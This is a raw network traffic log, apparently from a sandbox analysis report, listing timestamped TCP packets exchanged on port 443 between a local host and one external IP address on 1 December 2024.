                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.922811031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.922825098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.922861099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.926422119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.927777052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.927800894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.927867889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.927876949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.927927017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.962774038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.091088057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.091113091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.091219902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.091236115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.091742039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.096398115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.096414089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.096487999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.096496105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.096563101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.101931095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.101948023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.102006912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.102014065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.102070093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.107635021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.107656002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.107692003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.107712984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.107722998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.107791901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.112634897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.112653017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.112728119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.112745047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.114264011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.118259907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.118275881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.118334055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.118341923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.120542049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.123203039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.124078035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.124094009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.124159098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.124176025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.126688957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.129128933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.129149914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.129194975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.129203081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.129245996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.129245996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.130919933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.293589115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.293612957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.293844938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.293855906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.293906927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.297863007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.297878027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.297962904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.297971964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.298635960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.304775000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.304806948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.304858923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.304873943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.304891109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.304909945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.309292078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.309309006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.309401989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.309412956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.310858011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.314071894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.314091921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.314165115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.314165115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.314177036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.314254045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.319612980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.319636106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.319695950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.319705009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.319726944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.319791079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.325201035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.325222969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.325278997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.325287104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.325309992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.325342894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.329230070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.330838919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.330857992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.330914974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.330929041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.330940962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.330986023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.334216118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.494379044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.494405985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.494491100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.494504929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.494529963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.494561911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.499294043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.499330997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.499396086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.499396086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.499408007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.499465942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.504806995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.504837990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.504888058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.504909039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.504925966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.504951954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.510695934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.510723114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.510776997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.510785103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.510796070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.510905981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.515703917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.515734911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.515768051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.515774965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.515798092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.515825987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.521171093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.521195889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.521260023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.521260023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.521269083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.521317959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.526758909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.526792049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.526840925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.526848078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.526880026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.526900053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.529181957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.531764984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.531790972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.531857967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.531857967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.531867027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.531905890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.536632061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.695409060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.695441961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.695664883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.695682049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.695734024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.700479984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.700508118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.700591087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.700603962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.700654030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.700654030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.706126928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.706145048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.706197977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.706223011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.706265926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.706265926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.711680889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.711699009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.711772919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.711786032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.711847067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.716651917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.716670990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.716788054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.716810942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.716857910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.722436905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.722466946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.722522020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.722543955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.722573996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.722626925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.727986097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.728003025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.728077888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.728089094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.728159904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.733701944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.733720064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.733788967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.733798027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.733867884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.740220070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.897170067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.897192001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.897505999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.897521973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.897593021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.902703047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.902734995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.902826071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.902837992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.902918100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.907414913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.907435894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.907521009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.907530069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.907579899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.913255930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.913278103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.913363934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.913373947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.913433075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.920983076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.921004057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.921087980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.921108961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.921123028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.921159983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.924479008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.924498081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.924609900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.924617052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.924675941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.935031891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938000917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938020945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938194990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938194990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938206911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938271999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938941956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.938962936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.939023972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.939032078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.939177990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:04.947576046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.098407030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.098427057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.098527908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.098536968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.098593950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.103733063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.103749990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.103804111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.103812933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.103861094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.109194040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.109210014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.109260082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.109267950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.109322071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.109322071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.114744902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.114763021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.114840984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.114845991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.114922047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.120433092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.120449066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.120517015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.120522022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.120577097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.128355980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.128374100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.128493071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.128499985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.128587008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.133863926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.133887053 CET44349721142.132.252.48192.168.2.6
